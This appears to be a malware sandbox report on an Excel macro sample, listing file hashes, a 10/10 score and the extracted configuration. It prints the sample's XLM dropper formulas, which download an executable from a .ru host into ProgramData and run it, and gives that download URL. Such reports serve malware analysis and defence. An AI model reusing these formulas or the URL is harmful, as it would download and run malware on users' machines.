Overview

overview

10

Static

static

10

42b382be2e...9.xlsm

windows7-x64

10

42b382be2e...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276.zip

  • Size

    45KB

  • Sample

    250326-z4akkss1a1

  • MD5

    f0e511946dbf25ba70ef77636ddaaec8

  • SHA1

    f890230a292fca9d27f88c3725f41320ff4810ad

  • SHA256

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276

  • SHA512

    79b33a4198b6f4615cf454cc294fe27425cf9a9595a962df90e166489c3cea37f80c8eaff91c0e83005acba32716253358db42ca83055f6a5ddd6394995617db

  • SSDEEP

    768:Tx2U43NtxXkjkUXPKX/bNYvv8dtaYfbN0CWTqS+SaTS3FDY8ic:TUjJrU/WKeE26eS+v23KI

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://invoice7mukszq9nbpa7online.ru/unfeminized.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://invoice7mukszq9nbpa7online.ru/unfeminized.exe","C:\ProgramData\plaukbp.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\plaukbp.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://invoice7mukszq9nbpa7online.ru/unfeminized.exe

Targets

    • Target

      42b382be2e0f600fcec16ead4440475ffa839ed56724ef960b24f2affda4afb9.xlsm

    • Size

      52KB

    • MD5

      7595dc40f4afafd883b97b2690c04fe0

    • SHA1

      0e7b3cc495b0e570cc61a19ee27b7fab133a069a

    • SHA256

      42b382be2e0f600fcec16ead4440475ffa839ed56724ef960b24f2affda4afb9

    • SHA512

      47e1fc418f81809cd91dcdcf377a0acf85135cd67bc97a239ee3845516c585e1e29ee12ffa7a60b451d7e3568a818f80f17265756c666335d3b9769adc038520

    • SSDEEP

      1536:4MB1cciQkfzdjhJzBLCO7OJAgeSURsxhfwkWQAyk:4MB1c/dzBmK+xWIk

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks